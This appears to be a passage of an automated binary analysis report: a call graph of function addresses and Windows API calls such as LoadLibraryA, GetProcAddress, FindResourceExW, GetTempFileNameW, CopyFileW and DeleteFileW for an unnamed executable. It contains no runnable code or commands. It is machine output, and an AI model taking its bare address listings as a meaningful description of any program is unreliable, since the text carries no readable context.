94728->94917 94918 cd6532 63 API calls 3 library calls 94728->94918 94729->94717 94730->94717 94733->94728 94735->94717 94736->94728 94739->94717 94741->94717 94742->94717 94743->94717 94744->94602 94745->94658 94746->94654 94747->94654 94748->94654 94750 c9fe50 94749->94750 94776 c9fe7e 94749->94776 94751 caf4ea 48 API calls 94750->94751 94751->94776 94752 cb0f0a 52 API calls __cinit 94752->94776 94753 ca1473 95837 cdcc5c 86 API calls 4 library calls 94753->95837 94754 ca146e 94755 c96eed 48 API calls 94754->94755 94774 c9ffe1 94755->94774 94756 cc97ed InterlockedDecrement 94756->94776 94757 caf4ea 48 API calls 94757->94776 94760 c96eed 48 API calls 94760->94776 94762 ca0509 95838 cdcc5c 86 API calls 4 library calls 94762->95838 94763 d0a246 94766 c96eed 48 API calls 94763->94766 94764 d0a922 94764->94654 94766->94774 94768 c9d7f7 48 API calls 94768->94776 94769 d0a873 94769->94654 94770 d0a30e 94770->94774 95835 cc97ed InterlockedDecrement 94770->95835 94772 d0a973 95839 cdcc5c 86 API calls 4 library calls 94772->95839 94774->94654 94775 d0a982 94776->94752 94776->94753 94776->94754 94776->94756 94776->94757 94776->94760 94776->94762 94776->94763 94776->94768 94776->94770 94776->94772 94776->94774 94777 ca15b5 94776->94777 95833 ca1820 335 API calls 2 library calls 94776->95833 95834 ca1d10 59 API calls Mailbox 94776->95834 95836 cdcc5c 86 API calls 4 library calls 94777->95836 94778->94665 94779->94602 94781 c9d654 94780->94781 94789 c9d67e 94780->94789 94782 c9d65b 94781->94782 94785 c9d6c2 94781->94785 94783 c9d6ab 94782->94783 94784 c9d666 94782->94784 94783->94789 95841 cadce0 53 API calls 94783->95841 95840 c9d9a0 53 API calls __cinit 94784->95840 94785->94783 95842 cadce0 53 API calls 94785->95842 94789->94619 94789->94620 94790->94658 94791->94647 94792->94647 94793->94604 94794->94658 94795->94629 94796->94658 94797->94658 94798->94658 94799->94654 94800->94654 94801->94654 94802->94654 94803->94658 94804->94650 94805->94660 94806->94658 94807->94681 94809 c9ef1d 94808->94809 94810 c9ef2f 94808->94810 94919 c9e3b0 335 API calls 2 library calls 94809->94919 94920 cdcc5c 86 API calls 4 library calls 94810->94920 94812 c9ef26 94812->94717 94814 d086f9 94814->94814 94816 c9f130 94815->94816 94819 c9fe30 335 API calls 94816->94819 94821 c9f199 94816->94821 94817 c9f3dd 94820 d087c8 94817->94820 94832 c9f3f2 94817->94832 94865 c9f431 Mailbox 94817->94865 94818 c9f595 94826 c9d7f7 48 API calls 94818->94826 94818->94865 94822 d08728 94819->94822 94941 cdcc5c 86 API calls 4 library calls 94820->94941 94821->94817 94821->94818 94827 c9d7f7 48 API calls 94821->94827 94859 c9f229 94821->94859 94822->94821 94938 cdcc5c 86 API calls 4 library calls 94822->94938 94824 c9fe30 335 API calls 94824->94865 94828 d087a3 94826->94828 94829 d08772 94827->94829 94940 cb0f0a 52 API calls __cinit 94828->94940 94939 cb0f0a 52 API calls __cinit 94829->94939 94830 cdcc5c 86 API calls 94830->94865 94839 c9f418 94832->94839 94942 cd9af1 48 API calls 94832->94942 94833 d08b1b 94848 d08b2c 94833->94848 94849 d08bcf 94833->94849 94835 c9d6e9 55 API calls 94835->94865 94837 c9f770 94841 d08a45 94837->94841 94858 c9f77a 94837->94858 94838 d08c53 94956 cdcc5c 86 API calls 4 library calls 94838->94956 94839->94833 94860 c9f6aa 94839->94860 94839->94865 94840 d08810 94943 ceeef8 335 API calls 94840->94943 94948 cac1af 48 API calls 94841->94948 94842 c9fe30 335 API calls 94842->94860 94843 d08b7e 94951 cee40a 335 API calls Mailbox 94843->94951 94950 cef5ee 335 API calls 94848->94950 94953 cdcc5c 86 API calls 4 library calls 94849->94953 94850 d08beb 94954 cebdbd 335 API calls Mailbox 94850->94954 94854 ca1b90 48 API calls 94854->94865 94857 d08c00 94879 c9f537 Mailbox 94857->94879 94955 cdcc5c 86 API calls 4 library calls 94857->94955 94921 ca1b90 94858->94921 94859->94817 94859->94818 94859->94839 94859->94865 94860->94837 94860->94842 94863 c9fce0 94860->94863 94860->94865 94860->94879 94862 d08823 94862->94839 94864 d0884b 94862->94864 94863->94879 94952 cdcc5c 86 API calls 4 library calls 94863->94952 94944 ceccdc 48 API calls 94864->94944 94865->94824 94865->94830 94865->94835 94865->94838 94865->94843 94865->94850 94865->94854 94865->94863 94865->94879 94937 c9dd47 48 API calls _memcpy_s 94865->94937 94949 cc97ed InterlockedDecrement 94865->94949 94957 cac1af 48 API calls 94865->94957 94869 d08857 94871 d08865 94869->94871 94872 d088aa 94869->94872 94945 cd9b72 48 API calls 94871->94945 94875 d088a0 Mailbox 94872->94875 94946 cda69d 48 API calls 94872->94946 94873 c9fe30 335 API calls 94873->94879 94875->94873 94877 d088e7 94947 c9bc74 48 API calls 94877->94947 94879->94717 94881 ca479f 94880->94881 94882 ca4637 94880->94882 94885 c9ce19 48 API calls 94881->94885 94883 d06e05 94882->94883 94884 ca4643 94882->94884 95020 cee822 94883->95020 95019 ca4300 335 API calls _memcpy_s 94884->95019 94892 ca46e4 Mailbox 94885->94892 94888 d06e11 94889 ca4739 Mailbox 94888->94889 95060 cdcc5c 86 API calls 4 library calls 94888->95060 94889->94717 94891 ca4659 94891->94888 94891->94889 94891->94892 94960 ce6ff0 94892->94960 94969 cd6524 94892->94969 94972 c94252 94892->94972 94978 cdfa0c 94892->94978 94898 cae253 94897->94898 94900 d0df42 94897->94900 94898->94717 94899 d0df77 94900->94899 94901 d0df59 TranslateAcceleratorW 94900->94901 94901->94898 94903 cadca3 94902->94903 94904 cadc71 94902->94904 94903->94717 94904->94903 94905 cadc96 IsDialogMessageW 94904->94905 94906 d0dd1d GetClassLongW 94904->94906 94905->94903 94905->94904 94906->94904 94906->94905 94907->94717 94908->94687 94909->94690 94910->94695 94911->94717 94912->94717 94913->94728 94914->94728 94915->94728 94916->94728 94917->94728 94918->94728 94919->94812 94920->94814 94922 ca1cf6 94921->94922 94925 ca1ba2 94921->94925 94922->94865 94923 ca1bae 94928 ca1bb9 94923->94928 94959 cac15c 48 API calls 94923->94959 94925->94923 94926 caf4ea 48 API calls 94925->94926 94927 d049c4 94926->94927 94930 caf4ea 48 API calls 94927->94930 94929 ca1c5d 94928->94929 94931 caf4ea 48 API calls 94928->94931 94929->94865 94936 d049cf 94930->94936 94932 ca1c9f 94931->94932 94933 ca1cb2 94932->94933 94958 c92925 48 API calls 94932->94958 94933->94865 94935 caf4ea 48 API calls 94935->94936 94936->94923 94936->94935 94937->94865 94938->94821 94939->94859 94940->94865 94941->94879 94942->94840 94943->94862 94944->94869 94945->94875 94946->94877 94947->94875 94948->94865 94949->94865 94950->94865 94951->94863 94952->94879 94953->94879 94954->94857 94955->94879 94956->94879 94957->94865 94958->94933 94959->94928 94961 c9936c 81 API calls 94960->94961 94962 ce702a 94961->94962 95061 c9b470 94962->95061 94964 ce703a 94965 ce705f 94964->94965 94966 c9fe30 335 API calls 94964->94966 94968 ce7063 94965->94968 95089 c9cdb9 48 API calls 94965->95089 94966->94965 94968->94889 95099 cd6ca9 GetFileAttributesW 94969->95099 94973 c9425c 94972->94973 94977 c94263 94972->94977 95103 cb35e4 94973->95103 94975 c94283 FreeLibrary 94976 c94272 94975->94976 94976->94889 94977->94975 94977->94976 94979 cdfa1c __ftell_nolock 94978->94979 94980 cdfa44 94979->94980 95497 c9d286 48 API calls 94979->95497 94982 c9936c 81 API calls 94980->94982 94983 cdfa5e 94982->94983 94984 cdfb68 94983->94984 94985 cdfa80 94983->94985 94995 cdfb92 94983->94995 95409 c941a9 94984->95409 94987 c9936c 81 API calls 94985->94987 94993 cdfa8c _wcscpy _wcschr 94987->94993 94989 cdfb8e 94990 c9936c 81 API calls 94989->94990 94989->94995 94992 cdfbc7 94990->94992 94991 c941a9 136 API calls 94991->94989 95433 cb1dfc 94992->95433 94997 cdfade _wcscat 94993->94997 94998 cdfab0 _wcscat _wcscpy 94993->94998 94995->94889 94996 cdfbeb _wcscat _wcscpy 95007 c9936c 81 API calls 94996->95007 94999 c9936c 81 API calls 94997->94999 95001 c9936c 81 API calls 94998->95001 95000 cdfafc _wcscpy 94999->95000 95498 cd72cb GetFileAttributesW 95000->95498 95001->94997 95003 cdfb1c __wsetenvp 95003->94995 95004 c9936c 81 API calls 95003->95004 95005 cdfb48 95004->95005 95499 cd60dd 77 API calls 4 library calls 95005->95499 95009 cdfc82 95007->95009 95008 cdfb5c 95008->94995 95436 cd690b 95009->95436 95011 cdfca2 95012 cd6524 3 API calls 95011->95012 95013 cdfcb1 95012->95013 95014 c9936c 81 API calls 95013->95014 95016 cdfce2 95013->95016 95015 cdfccb 95014->95015 95442 cdbfa4 95015->95442 95018 c94252 84 API calls 95016->95018 95018->94995 95019->94891 95021 cee84e 95020->95021 95022 cee868 95020->95022 95825 cdcc5c 86 API calls 4 library calls 95021->95825 95826 ceccdc 48 API calls 95022->95826 95025 cee871 95026 c9fe30 334 API calls 95025->95026 95027 cee8cf 95026->95027 95028 cee96a 95027->95028 95030 cee916 95027->95030 95059 cee860 Mailbox 95027->95059 95029 cee978 95028->95029 95033 cee9c7 95028->95033 95828 cda69d 48 API calls 95029->95828 95827 cd9b72 48 API calls 95030->95827 95032 cee949 95035 ca45e0 334 API calls 95032->95035 95036 c9936c 81 API calls 95033->95036 95033->95059 95035->95059 95038 cee9e1 95036->95038 95037 cee99b 95829 c9bc74 48 API calls 95037->95829 95041 c9bdfa 48 API calls 95038->95041 95040 cee9a3 Mailbox 95043 ca3200 334 API calls 95040->95043 95042 ceea05 CharUpperBuffW 95041->95042 95044 ceea1f 95042->95044 95043->95059 95045 ceea26 95044->95045 95046 ceea72 95044->95046 95830 cd9b72 48 API calls 95045->95830 95047 c9936c 81 API calls 95046->95047 95048 ceea7a 95047->95048 95831 c91caa 49 API calls 95048->95831 95051 ceea54 95052 ca45e0 334 API calls 95051->95052 95052->95059 95053 ceea84 95054 c9936c 81 API calls 95053->95054 95053->95059 95055 ceea9f 95054->95055 95832 c9bc74 48 API calls 95055->95832 95057 ceeaaf 95058 ca3200 334 API calls 95057->95058 95058->95059 95059->94888 95060->94889 95062 c96b0f 48 API calls 95061->95062 95080 c9b495 95062->95080 95063 c9b69b 95092 c9ba85 48 API calls _memcpy_s 95063->95092 95065 c9b6b5 Mailbox 95065->94964 95068 d0397b 95096 cd26bc 88 API calls 4 library calls 95068->95096 95069 c9ba85 48 API calls 95069->95080 95072 c9b9e4 95098 cd26bc 88 API calls 4 library calls 95072->95098 95073 d03973 95073->95065 95076 d03989 95097 c9ba85 48 API calls _memcpy_s 95076->95097 95077 c9bcce 48 API calls 95077->95080 95079 d03909 95082 c96b4a 48 API calls 95079->95082 95080->95063 95080->95068 95080->95069 95080->95072 95080->95077 95080->95079 95081 c9bb85 48 API calls 95080->95081 95085 c9bdfa 48 API calls 95080->95085 95088 d03939 _memcpy_s 95080->95088 95090 c9c413 59 API calls 95080->95090 95091 c9bc74 48 API calls 95080->95091 95093 c9c6a5 49 API calls 95080->95093 95094 c9c799 48 API calls _memcpy_s 95080->95094 95081->95080 95083 d03914 95082->95083 95087 caf4ea 48 API calls 95083->95087 95086 c9b66c CharUpperBuffW 95085->95086 95086->95080 95087->95088 95095 cd26bc 88 API calls 4 library calls 95088->95095 95089->94968 95090->95080 95091->95080 95092->95065 95093->95080 95094->95080 95095->95073 95096->95076 95097->95073 95098->95073 95100 cd6529 95099->95100 95101 cd6cc4 FindFirstFileW 95099->95101 95100->94889 95101->95100 95102 cd6cd9 FindClose 95101->95102 95102->95100 95104 cb35f0 __lseeki64 95103->95104 95105 cb361c 95104->95105 95106 cb3604 95104->95106 95112 cb3614 __lseeki64 95105->95112 95116 cb4e1c 95105->95116 95138 cb7c0e 47 API calls __getptd_noexit 95106->95138 95109 cb3609 95139 cb6e10 8 API calls __woutput_l 95109->95139 95112->94977 95117 cb4e4e EnterCriticalSection 95116->95117 95118 cb4e2c 95116->95118 95119 cb362e 95117->95119 95118->95117 95120 cb4e34 95118->95120 95122 cb3578 95119->95122 95141 cb7cf4 95120->95141 95123 cb359b 95122->95123 95124 cb3587 95122->95124 95130 cb3597 95123->95130 95186 cb2c84 95123->95186 95226 cb7c0e 47 API calls __getptd_noexit 95124->95226 95126 cb358c 95227 cb6e10 8 API calls __woutput_l 95126->95227 95140 cb3653 LeaveCriticalSection LeaveCriticalSection _fprintf 95130->95140 95134 cb35b5 95203 cbe9d2 95134->95203 95136 cb35bb 95136->95130 95137 cb1c9d _free 47 API calls 95136->95137 95137->95130 95138->95109 95139->95112 95140->95112 95142 cb7d18 EnterCriticalSection 95141->95142 95143 cb7d05 95141->95143 95142->95119 95148 cb7d7c 95143->95148 95145 cb7d0b 95145->95142 95172 cb115b 47 API calls 3 library calls 95145->95172 95149 cb7d88 __lseeki64 95148->95149 95150 cb7da9 95149->95150 95151 cb7d91 95149->95151 95158 cb7e11 __lseeki64 95150->95158 95165 cb7da7 95150->95165 95173 cb81c2 47 API calls __NMSG_WRITE 95151->95173 95153 cb7d96 95174 cb821f 47 API calls 7 library calls 95153->95174 95156 cb7dbd 95159 cb7dd3 95156->95159 95160 cb7dc4 95156->95160 95157 cb7d9d 95175 cb1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 95157->95175 95158->95145 95161 cb7cf4 __lock 46 API calls 95159->95161 95177 cb7c0e 47 API calls __getptd_noexit 95160->95177 95164 cb7dda 95161->95164 95167 cb7de9 InitializeCriticalSectionAndSpinCount 95164->95167 95168 cb7dfe 95164->95168 95165->95150 95176 cb69d0 47 API calls __malloc_crt 95165->95176 95166 cb7dc9 95166->95158 95169 cb7e04 95167->95169 95178 cb1c9d 95168->95178 95184 cb7e1a LeaveCriticalSection _doexit 95169->95184 95173->95153 95174->95157 95176->95156 95177->95166 95179 cb1ccf _free 95178->95179 95180 cb1ca6 RtlFreeHeap 95178->95180 95179->95169 95180->95179 95181 cb1cbb 95180->95181 95185 cb7c0e 47 API calls __getptd_noexit 95181->95185 95183 cb1cc1 GetLastError 95183->95179 95184->95158 95185->95183 95187 cb2cbb 95186->95187 95188 cb2c97 95186->95188 95192 cbeb36 95187->95192 95188->95187 95189 cb2933 __ftell_nolock 47 API calls 95188->95189 95190 cb2cb4 95189->95190 95228 cbaf61 95190->95228 95193 cb35af 95192->95193 95194 cbeb43 95192->95194 95196 cb2933 95193->95196 95194->95193 95195 cb1c9d _free 47 API calls 95194->95195 95195->95193 95197 cb293d 95196->95197 95198 cb2952 95196->95198 95365 cb7c0e 47 API calls __getptd_noexit 95197->95365 95198->95134 95200 cb2942 95366 cb6e10 8 API calls __woutput_l 95200->95366 95202 cb294d 95202->95134 95204 cbe9de __lseeki64 95203->95204 95205 cbe9e6 95204->95205 95208 cbe9fe 95204->95208 95382 cb7bda 47 API calls __getptd_noexit 95205->95382 95207 cbea7b 95386 cb7bda 47 API calls __getptd_noexit 95207->95386 95208->95207 95213 cbea28 95208->95213 95209 cbe9eb 95383 cb7c0e 47 API calls __getptd_noexit 95209->95383 95212 cbea80 95387 cb7c0e 47 API calls __getptd_noexit 95212->95387 95215 cba8ed ___lock_fhandle 49 API calls 95213->95215 95217 cbea2e 95215->95217 95216 cbea88 95388 cb6e10 8 API calls __woutput_l 95216->95388 95219 cbea4c 95217->95219 95220 cbea41 95217->95220 95384 cb7c0e 47 API calls __getptd_noexit 95219->95384 95367 cbea9c 95220->95367 95221 cbe9f3 __lseeki64 95221->95136 95224 cbea47 95385 cbea73 LeaveCriticalSection __unlock_fhandle 95224->95385 95226->95126 95227->95130 95229 cbaf6d __lseeki64 95228->95229 95230 cbaf75 95229->95230 95235 cbaf8d 95229->95235 95326 cb7bda 47 API calls __getptd_noexit 95230->95326 95232 cbb022 95331 cb7bda 47 API calls __getptd_noexit 95232->95331 95233 cbaf7a 95327 cb7c0e 47 API calls __getptd_noexit 95233->95327 95235->95232 95238 cbafbf 95235->95238 95237 cbb027 95332 cb7c0e 47 API calls __getptd_noexit 95237->95332 95253 cba8ed 95238->95253 95241 cbb02f 95333 cb6e10 8 API calls __woutput_l 95241->95333 95242 cbafc5 95244 cbafeb 95242->95244 95245 cbafd8 95242->95245 95328 cb7c0e 47 API calls __getptd_noexit 95244->95328 95262 cbb043 95245->95262 95247 cbaf82 __lseeki64 95247->95187 95249 cbaff0 95329 cb7bda 47 API calls __getptd_noexit 95249->95329 95250 cbafe4 95330 cbb01a LeaveCriticalSection __unlock_fhandle 95250->95330 95254 cba8f9 __lseeki64 95253->95254 95255 cba946 EnterCriticalSection 95254->95255 95257 cb7cf4 __lock 47 API calls 95254->95257 95256 cba96c __lseeki64 95255->95256 95256->95242 95258 cba91d 95257->95258 95259 cba93a 95258->95259 95260 cba928 InitializeCriticalSectionAndSpinCount 95258->95260 95334 cba970 LeaveCriticalSection _doexit 95259->95334 95260->95259 95263 cbb050 __ftell_nolock 95262->95263 95264 cbb08d 95263->95264 95265 cbb0ac 95263->95265 95295 cbb082 95263->95295 95344 cb7bda 47 API calls __getptd_noexit 95264->95344 95268 cbb105 95265->95268 95269 cbb0e9 95265->95269 95273 cbb11c 95268->95273 95350 cbf82f 49 API calls 3 library calls 95268->95350 95347 cb7bda 47 API calls __getptd_noexit 95269->95347 95270 cbb86b 95270->95250 95271 cbb092 95345 cb7c0e 47 API calls __getptd_noexit 95271->95345 95335 cc3bf2 95273->95335 95276 cbb0ee 95348 cb7c0e 47 API calls __getptd_noexit 95276->95348 95278 cbb099 95346 cb6e10 8 API calls __woutput_l 95278->95346 95280 cbb12a 95282 cbb44b 95280->95282 95351 cb7a0d 47 API calls 2 library calls 95280->95351 95284 cbb7b8 WriteFile 95282->95284 95285 cbb463 95282->95285 95283 cbb0f5 95349 cb6e10 8 API calls __woutput_l 95283->95349 95289 cbb7e1 GetLastError 95284->95289 95294 cbb410 95284->95294 95288 cbb55a 95285->95288 95298 cbb479 95285->95298 95299 cbb663 95288->95299 95302 cbb565 95288->95302 95289->95294 95290 cbb150 GetConsoleMode 95290->95282 95292 cbb189 95290->95292 95291 cbb81b 95291->95295 95356 cb7c0e 47 API calls __getptd_noexit 95291->95356 95292->95282 95296 cbb199 GetConsoleCP 95292->95296 95294->95291 95294->95295 95301 cbb7f7 95294->95301 95358 cba70c 95295->95358 95296->95294 95303 cbb1c2 95296->95303 95297 cbb4e9 WriteFile 95297->95289 95304 cbb526 95297->95304 95298->95291 95298->95297 95299->95291 95305 cbb6d8 WideCharToMultiByte 95299->95305 95300 cbb843 95357 cb7bda 47 API calls __getptd_noexit 95300->95357 95307 cbb7fe 95301->95307 95308 cbb812 95301->95308 95302->95291 95309 cbb5de WriteFile 95302->95309 95303->95294 95320 cc40f7 59 API calls __chsize_nolock 95303->95320 95321 cbb28f WideCharToMultiByte 95303->95321 95322 cbb2f6 95303->95322 95352 cb1688 57 API calls __isleadbyte_l 95303->95352 95304->95294 95304->95298 95318 cbb555 95304->95318 95305->95289 95319 cbb71f 95305->95319 95353 cb7c0e 47 API calls __getptd_noexit 95307->95353 95355 cb7bed 47 API calls 3 library calls 95308->95355 95309->95289 95312 cbb62d 95309->95312 95312->95294 95312->95302 95312->95318 95313 cbb727 WriteFile 95316 cbb77a GetLastError 95313->95316 95313->95319 95314 cbb803 95354 cb7bda 47 API calls __getptd_noexit 95314->95354 95316->95319 95318->95294 95319->95294 95319->95299 95319->95313 95319->95318 95320->95303 95321->95294 95323 cbb2ca WriteFile 95321->95323 95322->95289 95322->95294 95322->95303 95324 cc5884 WriteConsoleW CreateFileW __chsize_nolock 95322->95324 95325 cbb321 WriteFile 95322->95325 95323->95289 95323->95322 95324->95322 95325->95289 95325->95322 95326->95233 95327->95247 95328->95249 95329->95250 95330->95247 95331->95237 95332->95241 95333->95247 95334->95255 95336 cc3bfd 95335->95336 95337 cc3c0a 95335->95337 95338 cb7c0e __woutput_l 47 API calls 95336->95338 95339 cc3c16 95337->95339 95340 cb7c0e __woutput_l 47 API calls 95337->95340 95341 cc3c02 95338->95341 95339->95280 95342 cc3c37 95340->95342 95341->95280 95343 cb6e10 __woutput_l 8 API calls 95342->95343 95343->95341 95344->95271 95345->95278 95346->95295 95347->95276 95348->95283 95349->95295 95350->95273 95351->95290 95352->95303 95353->95314 95354->95295 95355->95295 95356->95300 95357->95295 95359 cba716 IsProcessorFeaturePresent 95358->95359 95360 cba714 95358->95360 95362 cc37b0 95359->95362 95360->95270 95363 cc375f ___raise_securityfailure 5 API calls 95362->95363 95364 cc3893 95363->95364 95364->95270 95365->95200 95366->95202 95389 cbaba4 95367->95389 95369 cbeb00 95402 cbab1e 48 API calls 2 library calls 95369->95402 95371 cbeaaa 95371->95369 95374 cbaba4 __chsize_nolock 47 API calls 95371->95374 95381 cbeade 95371->95381 95372 cbaba4 __chsize_nolock 47 API calls 95375 cbeaea CloseHandle 95372->95375 95373 cbeb08 95380 cbeb2a 95373->95380 95403 cb7bed 47 API calls 3 library calls 95373->95403 95376 cbead5 95374->95376 95375->95369 95378 cbeaf6 GetLastError 95375->95378 95377 cbaba4 __chsize_nolock 47 API calls 95376->95377 95377->95381 95378->95369 95380->95224 95381->95369 95381->95372 95382->95209 95383->95221 95384->95224 95385->95221 95386->95212 95387->95216 95388->95221 95390 cbabaf 95389->95390 95391 cbabc4 95389->95391 95404 cb7bda 47 API calls __getptd_noexit 95390->95404 95396 cbabe9 95391->95396 95406 cb7bda 47 API calls __getptd_noexit 95391->95406 95394 cbabb4 95405 cb7c0e 47 API calls __getptd_noexit 95394->95405 95396->95371 95397 cbabf3 95407 cb7c0e 47 API calls __getptd_noexit 95397->95407 95398 cbabbc 95398->95371 95400 cbabfb 95408 cb6e10 8 API calls __woutput_l 95400->95408 95402->95373 95403->95380 95404->95394 95405->95398 95406->95397 95407->95400 95408->95398 95500 c94214 95409->95500 95414 d04f73 95416 c94252 84 API calls 95414->95416 95415 c941d4 LoadLibraryExW 95510 c94291 95415->95510 95418 d04f7a 95416->95418 95420 c94291 3 API calls 95418->95420 95422 d04f82 95420->95422 95536 c944ed 95422->95536 95423 c941fb 95423->95422 95424 c94207 95423->95424 95426 c94252 84 API calls 95424->95426 95428 c9420c 95426->95428 95428->94989 95428->94991 95430 d04fa9 95544 c94950 95430->95544 95716 cb1e46 95433->95716 95437 cd6918 _wcschr __ftell_nolock 95436->95437 95438 cd692e _wcscat _wcscpy 95437->95438 95439 cb1dfc __wsplitpath 47 API calls 95437->95439 95438->95011 95440 cd695d 95439->95440 95441 cb1dfc __wsplitpath 47 API calls 95440->95441 95441->95438 95443 cdbfb1 __ftell_nolock 95442->95443 95444 caf4ea 48 API calls 95443->95444 95445 cdc00e 95444->95445 95446 c947b7 48 API calls 95445->95446 95447 cdc018 95446->95447 95448 cdbdb4 GetSystemTimeAsFileTime 95447->95448 95449 cdc023 95448->95449 95450 c94517 83 API calls 95449->95450 95451 cdc036 _wcscmp 95450->95451 95452 cdc05a 95451->95452 95453 cdc107 95451->95453 95759 cdc56d 95452->95759 95455 cdc56d 94 API calls 95453->95455 95470 cdc0d3 _wcscat 95455->95470 95457 cb1dfc __wsplitpath 47 API calls 95463 cdc088 _wcscat _wcscpy 95457->95463 95458 c944ed 64 API calls 95460 cdc12c 95458->95460 95459 cdc110 95459->95016 95461 c944ed 64 API calls 95460->95461 95462 cdc13c 95461->95462 95464 c944ed 64 API calls 95462->95464 95465 cb1dfc __wsplitpath 47 API calls 95463->95465 95466 cdc157 95464->95466 95465->95470 95467 c944ed 64 API calls 95466->95467 95468 cdc167 95467->95468 95469 c944ed 64 API calls 95468->95469 95471 cdc182 95469->95471 95470->95458 95470->95459 95472 c944ed 64 API calls 95471->95472 95473 cdc192 95472->95473 95474 c944ed 64 API calls 95473->95474 95475 cdc1a2 95474->95475 95476 c944ed 64 API calls 95475->95476 95477 cdc1b2 95476->95477 95742 cdc71a GetTempPathW GetTempFileNameW 95477->95742 95479 cdc1be 95480 cb3499 117 API calls 95479->95480 95491 cdc1cf 95480->95491 95481 cdc289 95482 cb35e4 __fcloseall 83 API calls 95481->95482 95483 cdc294 95482->95483 95485 cdc2ae 95483->95485 95486 cdc29a DeleteFileW 95483->95486 95484 c944ed 64 API calls 95484->95491 95487 cdc342 CopyFileW 95485->95487 95492 cdc2b8 95485->95492 95486->95459 95488 cdc358 DeleteFileW 95487->95488 95489 cdc36a DeleteFileW 95487->95489 95488->95459 95756 cdc6d9 CreateFileW 95489->95756 95491->95459 95491->95481 95491->95484 95743 cb2aae 95491->95743 95765 cdb965 95492->95765 95496 cdc331 DeleteFileW 95496->95459 95497->94980 95498->95003 95499->95008 95549 c94339 95500->95549 95504 c941bb 95507 cb3499 95504->95507 95505 c94244 FreeLibrary 95505->95504 95506 c9423c 95506->95504 95506->95505 95557 cb34ae 95507->95557 95509 c941c8 95509->95414 95509->95415 95636 c942e4 95510->95636 95513 c942b8 95514 c941ec 95513->95514 95515 c942c1 FreeLibrary 95513->95515 95517 c94380 95514->95517 95515->95514 95518 caf4ea 48 API calls 95517->95518 95519 c94395 95518->95519 95520 c947b7 48 API calls 95519->95520 95521 c943a1 _memcpy_s 95520->95521 95522 c943dc 95521->95522 95523 c94499 95521->95523 95524 c944d1 95521->95524 95525 c94950 57 API calls 95522->95525 95644 c9406b CreateStreamOnHGlobal 95523->95644 95655 cdc750 93 API calls 95524->95655 95529 c943e5 95525->95529 95528 c944ed 64 API calls 95528->95529 95529->95528 95530 c94479 95529->95530 95532 d04ed7 95529->95532 95650 c94517 95529->95650 95530->95423 95533 c94517 83 API calls 95532->95533 95534 d04eeb 95533->95534 95535 c944ed 64 API calls 95534->95535 95535->95530 95537 d04fc0 95536->95537 95538 c944ff 95536->95538 95673 cb381e 95538->95673 95541 cdbf5a 95693 cdbdb4 95541->95693 95543 cdbf70 95543->95430 95545 d05002 95544->95545 95546 c9495f 95544->95546 95698 cb3e65 95546->95698 95548 c94967 95553 c9434b 95549->95553 95552 c94321 LoadLibraryA GetProcAddress 95552->95506 95554 c9422f 95553->95554 95555 c94354 LoadLibraryA 95553->95555 95554->95506 95554->95552 95555->95554 95556 c94365 GetProcAddress 95555->95556 95556->95554 95560 cb34ba __lseeki64 95557->95560 95558 cb34cd 95605 cb7c0e 47 API calls __getptd_noexit 95558->95605 95560->95558 95562 cb34fe 95560->95562 95561 cb34d2 95606 cb6e10 8 API calls __woutput_l 95561->95606 95576 cbe4c8 95562->95576 95565 cb3503 95566 cb3519 95565->95566 95567 cb350c 95565->95567 95569 cb3543 95566->95569 95570 cb3523 95566->95570 95607 cb7c0e 47 API calls __getptd_noexit 95567->95607 95590 cbe5e0 95569->95590 95608 cb7c0e 47 API calls __getptd_noexit 95570->95608 95571 cb34dd __lseeki64 @_EH4_CallFilterFunc@8 95571->95509 95577 cbe4d4 __lseeki64 95576->95577 95578 cb7cf4 __lock 47 API calls 95577->95578 95588 cbe4e2 95578->95588 95579 cbe559 95615 cb69d0 47 API calls __malloc_crt 95579->95615 95580 cbe552 95610 cbe5d7 95580->95610 95583 cbe560 95583->95580 95585 cbe56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 95583->95585 95584 cbe5cc __lseeki64 95584->95565 95585->95580 95586 cb7d7c __mtinitlocknum 47 API calls 95586->95588 95588->95579 95588->95580 95588->95586 95613 cb4e5b 48 API calls __lock 95588->95613 95614 cb4ec5 LeaveCriticalSection LeaveCriticalSection _doexit 95588->95614 95591 cbe600 __wopenfile 95590->95591 95592 cbe61a 95591->95592 95604 cbe7d5 95591->95604 95622 cb185b 59 API calls 2 library calls 95591->95622 95620 cb7c0e 47 API calls __getptd_noexit 95592->95620 95594 cbe61f 95621 cb6e10 8 API calls __woutput_l 95594->95621 95596 cbe838 95617 cc63c9 95596->95617 95598 cb354e 95609 cb3570 LeaveCriticalSection LeaveCriticalSection _fprintf 95598->95609 95600 cbe7ce 95600->95604 95623 cb185b 59 API calls 2 library calls 95600->95623 95602 cbe7ed 95602->95604 95624 cb185b 59 API calls 2 library calls 95602->95624 95604->95592 95604->95596 95605->95561 95606->95571 95607->95571 95608->95571 95609->95571 95616 cb7e58 LeaveCriticalSection 95610->95616 95612 cbe5de 95612->95584 95613->95588 95614->95588 95615->95583 95616->95612 95625 cc5bb1 95617->95625 95619 cc63e2 95619->95598 95620->95594 95621->95598 95622->95600 95623->95602 95624->95604 95627 cc5bbd __lseeki64 95625->95627 95626 cc5bcf 95628 cb7c0e __woutput_l 47 API calls 95626->95628 95627->95626 95630 cc5c06 95627->95630 95629 cc5bd4 95628->95629 95631 cb6e10 __woutput_l 8 API calls 95629->95631 95632 cc5c78 __wsopen_helper 110 API calls 95630->95632 95635 cc5bde __lseeki64 95631->95635 95633 cc5c23 95632->95633 95634 cc5c4c __wsopen_helper LeaveCriticalSection 95633->95634 95634->95635 95635->95619 95640 c942f6 95636->95640 95639 c942cc LoadLibraryA GetProcAddress 95639->95513 95641 c942aa 95640->95641 95642 c942ff LoadLibraryA 95640->95642 95641->95513 95641->95639 95642->95641 95643 c94310 GetProcAddress 95642->95643 95643->95641 95645 c94085 FindResourceExW 95644->95645 95649 c940a2 95644->95649 95646 d04f16 LoadResource 95645->95646 95645->95649 95647 d04f2b SizeofResource 95646->95647 95646->95649 95648 d04f3f LockResource 95647->95648 95647->95649 95648->95649 95649->95522 95651 d04fe0 95650->95651 95652 c94526 95650->95652 95656 cb3a8d 95652->95656 95654 c94534 95654->95529 95655->95522 95659 cb3a99 __lseeki64 95656->95659 95657 cb3aa7 95669 cb7c0e 47 API calls __getptd_noexit 95657->95669 95658 cb3acd 95662 cb4e1c __lock_file 48 API calls 95658->95662 95659->95657 95659->95658 95661 cb3aac 95670 cb6e10 8 API calls __woutput_l 95661->95670 95664 cb3ad3 95662->95664 95671 cb39fe 